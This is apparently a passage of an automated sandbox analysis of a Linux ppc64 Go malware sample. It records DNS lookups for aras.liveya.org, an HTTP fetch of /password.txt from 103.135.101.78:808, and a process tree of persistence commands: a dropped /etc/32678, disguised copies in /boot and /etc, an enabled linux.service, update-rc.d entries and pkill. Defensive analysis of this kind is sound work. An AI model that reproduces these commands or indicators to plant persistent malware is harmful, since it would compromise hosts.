                                                              LOAD         | 0x260000 | 0x270000        | 0x270000         | 0x23f840  | 0x23f840    | 5.3456  | 0x4    | R                 | 0x10000 |                  | .rodata .typelink .itablink .gosymtab .gopclntab
                                                              LOAD         | 0x4a0000 | 0x4b0000        | 0x4b0000         | 0x3cbc0   | 0x84570     | 5.2607  | 0x6    | RW                | 0x10000 |                  | .go.buildinfo .noptrdata .data .bss .noptrbss
                                                              GNU_STACK    | 0x0      | 0x0             | 0x0              | 0x0       | 0x0         | 0.0000  | 0x6    | RW                | 0x8     |                  |
                                                              LOOS+5041580 | 0x0      | 0x0             | 0x0              | 0x0       | 0x0         | 0.0000  | 0x2a00 |                   | 0x8     |                  |
                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Nov 25, 2024 23:47:46.764223099 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:46.764339924 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:51.767396927 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:51.767617941 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:56.771615028 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:56.771750927 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:00.431859016 CET47700808192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:00.553271055 CET80847700103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:01.778757095 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:01.778881073 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:06.783572912 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:06.783754110 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:11.795192957 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:11.795726061 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:16.802113056 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:16.802301884 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:21.808976889 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:21.809382915 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:26.822876930 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:26.823084116 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:31.134639978 CET47700808192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:31.254910946 CET80847700103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:31.836054087 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:31.836178064 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:36.852710962 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:36.852826118 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:41.854557991 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:41.854819059 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:46.862015009 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:46.863245964 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:51.875219107 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:51.875399113 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:56.881001949 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:56.881314993 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:49:01.849447012 CET47700808192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:49:01.895668030 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:49:01.895884037 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:49:01.969445944 CET80847700103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:49:06.900502920 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:49:06.900757074 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:49:11.900351048 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:49:11.900505066 CET4241252462192.168.2.14103.135.101.78
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 23:47:09.037570000 CET | 52550 | 53 | 192.168.2.14 | 1.1.1.1
Nov 25, 2024 23:47:09.177530050 CET | 53 | 52550 | 1.1.1.1 | 192.168.2.14
Nov 25, 2024 23:47:09.631686926 CET | 51580 | 53 | 192.168.2.14 | 1.1.1.1
Nov 25, 2024 23:47:09.770894051 CET | 53 | 51580 | 1.1.1.1 | 192.168.2.14
Nov 25, 2024 23:47:09.795734882 CET | 52556 | 53 | 192.168.2.14 | 1.1.1.1
Nov 25, 2024 23:47:09.800288916 CET | 33072 | 53 | 192.168.2.14 | 1.1.1.1
Nov 25, 2024 23:47:09.935331106 CET | 53 | 52556 | 1.1.1.1 | 192.168.2.14
Nov 25, 2024 23:47:09.939930916 CET | 53 | 33072 | 1.1.1.1 | 192.168.2.14
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Nov 25, 2024 23:47:30.687306881 CET | 192.168.2.1 | 192.168.2.14 | 828b | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 23:47:09.037570000 CET | 192.168.2.14 | 1.1.1.1 | 0x2080 | Standard query (0) | www.google.com | 28 | IN (0x0001) | false
Nov 25, 2024 23:47:09.631686926 CET | 192.168.2.14 | 1.1.1.1 | 0xceb1 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 23:47:09.795734882 CET | 192.168.2.14 | 1.1.1.1 | 0xef07 | Standard query (0) | aras.liveya.org | 28 | IN (0x0001) | false
Nov 25, 2024 23:47:09.800288916 CET | 192.168.2.14 | 1.1.1.1 | 0x77ca | Standard query (0) | aras.liveya.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 23:47:09.177530050 CET | 1.1.1.1 | 192.168.2.14 | 0x2080 | No error (0) | www.google.com | | | 28 | IN (0x0001) | false
Nov 25, 2024 23:47:09.770894051 CET | 1.1.1.1 | 192.168.2.14 | 0xceb1 | No error (0) | www.google.com | | 142.250.181.100 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 23:47:09.939930916 CET | 1.1.1.1 | 192.168.2.14 | 0x77ca | No error (0) | aras.liveya.org | | 103.135.101.78 | A (IP address) | IN (0x0001) | false
                                                              • 103.135.101.78:808
Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.2.14 | 47700 | 103.135.101.78 | 808
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 23:47:28.847290993 CET | 123 | OUT | GET /password.txt HTTP/1.1
                                                              Host: 103.135.101.78:808
                                                              User-Agent: Go-http-client/1.1
                                                              Accept-Encoding: gzip
Nov 25, 2024 23:47:30.432127953 CET | 213 | IN | HTTP/1.1 200 OK
                                                              Accept-Ranges: bytes
                                                              Content-Length: 16
                                                              Content-Type: text/plain; charset=utf-8
                                                              Last-Modified: Sat, 21 May 2022 20:57:32 GMT
                                                              Date: Mon, 25 Nov 2024 22:47:30 GMT
                                                              Data Raw: cb 5e cf 60 9d e0 4a 51 15 21 27 9b bc c8 4c c8
                                                              Data Ascii: ^`JQ!'L


                                                              System Behavior

                                                              Start time (UTC):22:47:03
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:/tmp/linux_ppc64el.elf
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/bin/bash
                                                              Arguments:/bin/bash -c /etc/32678&
                                                              File size:1183448 bytes
                                                              MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/bin/bash
                                                              Arguments:-
                                                              File size:1183448 bytes
                                                              MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/32678
                                                              Arguments:/etc/32678
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/32678
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sleep
                                                              Arguments:sleep 60
                                                              File size:39256 bytes
                                                              MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:service crond start
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/basename
                                                              Arguments:basename /usr/sbin/service
                                                              File size:39256 bytes
                                                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/basename
                                                              Arguments:basename /usr/sbin/service
                                                              File size:39256 bytes
                                                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl --quiet is-active multi-user.target
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl list-unit-files --full --type=socket
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sed
                                                              Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                              File size:121288 bytes
                                                              MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                              Start time (UTC):22:47:17
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl start crond.service
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:/tmp/linux_ppc64el.elf
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/update-rc.d
                                                              Arguments:update-rc.d linux_kill defaults
                                                              File size:3478464 bytes
                                                              MD5 hash:16a21f464119ea7fad1d3660de963637

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/update-rc.d
                                                              Arguments:-
                                                              File size:3478464 bytes
                                                              MD5 hash:16a21f464119ea7fad1d3660de963637

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl daemon-reload
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:47:19
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:19
                                                              Start date (UTC):25/11/2024
                                                              Path:/bin/bash
                                                              Arguments:/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
                                                              File size:1183448 bytes
                                                              MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                              Start time (UTC):22:47:19
                                                              Start date (UTC):25/11/2024
                                                              Path:/bin/bash
                                                              Arguments:-
                                                              File size:1183448 bytes
                                                              MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                              Start time (UTC):22:47:19
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl daemon-reload
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:47:20
                                                              Start date (UTC):25/11/2024
                                                              Path:/bin/bash
                                                              Arguments:-
                                                              File size:1183448 bytes
                                                              MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                              Start time (UTC):22:47:20
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl enable linux.service
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:47:21
                                                              Start date (UTC):25/11/2024
                                                              Path:/bin/bash
                                                              Arguments:-
                                                              File size:1183448 bytes
                                                              MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                              Start time (UTC):22:47:21
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl start linux.service
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:47:42
                                                              Start date (UTC):25/11/2024
                                                              Path:/bin/bash
                                                              Arguments:-
                                                              File size:1183448 bytes
                                                              MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                              Start time (UTC):22:47:42
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/journalctl
                                                              Arguments:journalctl -xe --no-pager
                                                              File size:80120 bytes
                                                              MD5 hash:bf3a987344f3bacafc44efd882abda8b

                                                              Start time (UTC):22:47:09
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):22:47:09
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              File size:22760 bytes
                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                              Start time (UTC):22:47:20
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):22:47:20
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              File size:22760 bytes
                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                              Start time (UTC):22:47:21
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):22:47:21
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              File size:22760 bytes
                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                              Start time (UTC):22:47:23
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):22:47:23
                                                              Start date (UTC):25/11/2024
                                                              Path:/boot/System.img.config
                                                              Arguments:/boot/System.img.config
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:25
                                                              Start date (UTC):25/11/2024
                                                              Path:/boot/System.img.config
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:25
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/pkill
                                                              Arguments:pkill -9 32678
                                                              File size:30968 bytes
                                                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                              Start time (UTC):22:47:41
                                                              Start date (UTC):25/11/2024
                                                              Path:/boot/System.img.config
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:41
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sh
                                                              Arguments:sh -c /etc/32678&
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:41
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:41
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/32678
                                                              Arguments:/etc/32678
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:42
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/32678
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:42
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sleep
                                                              Arguments:sleep 60
                                                              File size:39256 bytes
                                                              MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                              Start time (UTC):22:48:42
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/32678
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:42
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/id.services.conf
                                                              Arguments:/etc/id.services.conf
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:48:44
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/id.services.conf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:48:44
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/pkill
                                                              Arguments:pkill -9 32678
                                                              File size:30968 bytes
                                                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/id.services.conf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sh
                                                              Arguments:sh -c /etc/32678&
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/32678
                                                              Arguments:/etc/32678
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/32678
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sleep
                                                              Arguments:sleep 60
                                                              File size:39256 bytes
                                                              MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/id.services.conf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:service crond start
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/basename
                                                              Arguments:basename /usr/sbin/service
                                                              File size:39256 bytes
                                                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/basename
                                                              Arguments:basename /usr/sbin/service
                                                              File size:39256 bytes
                                                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                              Start time (UTC):22:48:46
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:46
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl --quiet is-active multi-user.target
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:48:47
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:47
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:47
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl list-unit-files --full --type=socket
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:48:47
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:48:47
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sed
                                                              Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                              File size:121288 bytes
                                                              MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                              Start time (UTC):22:48:49
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl start crond.service
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/id.services.conf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:48:45
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/id.services.conf
                                                              Arguments:/etc/id.services.conf
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:41
                                                              Start date (UTC):25/11/2024
                                                              Path:/boot/System.img.config
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Start time (UTC):22:47:41
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:service crond start
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:41
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:41
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/basename
                                                              Arguments:basename /usr/sbin/service
                                                              File size:39256 bytes
                                                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                              Start time (UTC):22:47:42
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:42
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/basename
                                                              Arguments:basename /usr/sbin/service
                                                              File size:39256 bytes
                                                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                              Start time (UTC):22:47:42
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:42
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl --quiet is-active multi-user.target
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:47:43
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:43
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:43
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl list-unit-files --full --type=socket
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):22:47:43
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):22:47:43
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sed
                                                              Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                              File size:121288 bytes
                                                              MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                              Start time (UTC):22:47:45
